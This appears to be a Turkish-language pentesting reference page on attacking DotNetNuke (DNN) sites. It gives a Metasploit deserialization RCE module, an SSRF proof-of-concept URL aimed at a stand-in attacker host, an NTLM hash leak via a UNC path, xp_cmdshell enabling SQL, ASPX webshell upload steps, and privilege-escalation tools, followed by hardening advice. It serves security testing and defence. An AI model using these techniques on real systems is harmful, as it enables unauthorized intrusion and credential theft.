DotNetNuke (DNN)

Reading time: 4 minutes

DotNetNuke (DNN)

DNN'ye yönetici olarak girdiğinizde RCE elde etmek kolaydır, ancak son birkaç yılda bir dizi kimlik doğrulaması yapılmamış ve kimlik doğrulaması sonrası teknik yayınlanmıştır. Aşağıdaki kılavuz, hem saldırgan hem de savunma çalışmaları için en kullanışlı temel bileşenleri toplar.

Versiyon & Ortam Sayımı

• X-DNN HTTP yanıt başlığını kontrol edin – genellikle tam platform sürümünü açıklar.
• Kurulum sihirbazı, /Install/Install.aspx?mode=install içinde sürümü sızdırır (çok eski kurulumlarda erişilebilir).
• /API/PersonaBar/GetStatus (9.x) düşük ayrıcalıklı kullanıcılar için "dnnVersion" içeren bir JSON nesnesi döner.
• Canlı bir örnekte göreceğiniz tipik çerezler:
• .DOTNETNUKE – ASP.NET formları kimlik doğrulama bileti.
• DNNPersonalization – XML/serileştirilmiş kullanıcı profili verilerini içerir (eski sürümler – aşağıdaki RCE'ye bakın).

Kimlik Doğrulaması Yapılmamış Sömürü

1. Çerez Serileştirme RCE (CVE-2017-9822 & takipleri)

Etkilenen sürümler ≤ 9.3.0-RC

DNNPersonalization, yerleşik 404 işleyicisi etkinleştirildiğinde her istekte serileştirilir. Bu nedenle, hazırlanmış XML, keyfi gadget zincirlerine ve kod yürütmeye yol açabilir.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

Modül, yamanmış ancak hala savunmasız olan sürümler için doğru yolu otomatik olarak seçer (CVE-2018-15811/15812/18325/18326). Sömürü, 7.x–9.1.x sürümlerinde kimlik doğrulama olmadan ve 9.2.x+ sürümlerinde doğrulanmış düşük ayrıcalıklı bir hesapla çalışır.

2. Sunucu Tarafı İstek Sahteciliği (CVE-2025-32372)

Etkilenen sürümler < 9.13.8 – Yamanın yayımlanma tarihi Nisan 2025

Eski DnnImageHandler düzeltmesinin bir atlatması, bir saldırganın sunucuyu keyfi GET istekleri yapmaya zorlamasını sağlar (yarı-kör SSRF). Pratik etkiler:

• Bulut dağıtımlarında iç port taraması / meta veri hizmeti keşfi.
• Aksi takdirde İnternet'ten güvenlik duvarıyla korunmuş olan ev sahiplerine ulaşma.

Kanıt konsepti (değiştir TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

İstek arka planda tetiklenir; geri çağırmalar için dinleyicinizi izleyin.

3. NTLM Hash Sızıntısı UNC Yönlendirmesi ile (CVE-2025-52488)

Etkilenen sürümler 6.0.0 – 9.x (< 10.0.1)

Özel olarak hazırlanmış içerik, DNN'nin \\attacker\share\img.png gibi bir UNC yolu kullanarak bir kaynağı almaya çalışmasına neden olabilir. Windows, NTLM müzakeresini memnuniyetle gerçekleştirir ve sunucu-hesap hash'lerini saldırgana sızdırır. 10.0.1 sürümüne yükseltin veya güvenlik duvarında dışa dönük SMB'yi devre dışı bırakın.

4. IP Filtre Atlatma (CVE-2025-52487)

Yönetici portalı koruması için Host/IP Filtreleri'ne güvenen yöneticiler, 10.0.1 sürümünden önceki sürümlerin, ters proxy senaryosunda X-Forwarded-For'ı manipüle ederek atlatılabileceğini bilmelidir.

Kimlik Doğrulamadan RCE'ye

SQL konsolu aracılığıyla

Ayarlar → SQL altında, site veritabanına karşı sorgu çalıştırmaya olanak tanıyan yerleşik bir sorgu penceresi bulunmaktadır. Microsoft SQL Server'da xp_cmdshell'i etkinleştirip komutlar başlatabilirsiniz:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

ASPX webshell yükleme ile

1. Ayarlar → Güvenlik → Daha Fazla → Daha Fazla Güvenlik Ayarları kısmına gidin.
2. İzin Verilen Dosya Uzantıları kısmına aspx (veya asp) ekleyin ve Kaydet butonuna tıklayın.
3. /admin/file-management kısmına gidin ve shell.aspx dosyasını yükleyin.
4. Bunu /Portals/0/shell.aspx adresinde tetikleyin.

Windows'ta Yetki Yükseltme

Kod yürütme IIS AppPool<Site> olarak gerçekleştirildiğinde, yaygın Windows yetki yükseltme teknikleri geçerlidir. Eğer sistem savunmasızsa, şunları kullanabilirsiniz:

• PrintSpoofer / SpoolFool ile SeImpersonatePrivilege'i kötüye kullanın.
• Service Accounts'tan kaçmak için Juicy/Sharp Potatoes kullanın.

Güçlendirme Önerileri (Mavi Ekip)

• En az 9.13.9 sürümüne (SSRF atlatmasını düzeltir) veya tercihen 10.0.1 sürümüne yükseltin (IP filtreleme ve NTLM sorunları).
• Kurulumdan sonra kalan InstallWizard.aspx* dosyalarını kaldırın.
• Çıkışta SMB'yi (portlar 445/139) devre dışı bırakın.
• DNN içinde değil, kenar proxy'sinde güçlü Host Filtreleri uygulayın.
• Kullanılmıyorsa /API/RemoteContentProxy erişimini engelleyin.

Referanslar

• Metasploit dnn_cookie_deserialization_rce modül belgeleri – pratik kimlik doğrulamasız RCE detayları (GitHub).
• GitHub Güvenlik Danışmanlığı GHSA-3f7v-qx94-666m – 2025 SSRF atlatma ve yamanma bilgileri.